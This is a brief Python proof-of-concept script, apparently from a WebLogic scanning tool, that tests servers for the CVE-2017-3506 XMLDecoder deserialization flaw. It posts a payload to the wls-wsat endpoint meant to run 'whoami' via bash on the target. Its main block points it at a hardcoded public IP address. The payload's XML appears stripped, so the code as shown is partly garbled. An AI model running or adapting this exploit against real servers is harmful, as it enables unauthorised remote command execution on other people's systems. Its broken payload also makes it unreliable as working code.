# https://github.com/rabbitmask/WeblogicR # !/usr/bin/env python # _*_ coding:utf-8 _*_ import requests import re heads = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', 'Content-Type': 'text/xml;charset=UTF-8' } def check(url): if '://' not in str(url): url = "http://" + url if "/" in url: url += '/wls-wsat/CoordinatorPortType' post_str = ''' /bin/bash -c whoami ''' try: response = requests.post(url, data=post_str, verify=False, timeout=10, headers=heads) response = response.text response = re.search(u".*", response).group(0) except: response = "" if 'java.lang.ProcessBuilder' in response or "0" in response: result = '目标Weblogic存在XMLDecoder反序列化,CVE-2017-3506 : %s' % url return result # else: # return 'CVE-2017-3506' def poc(ip): try: result = check(ip) return result except: pass if __name__ == '__main__': a = poc('181.198.62.181:7001') print(a)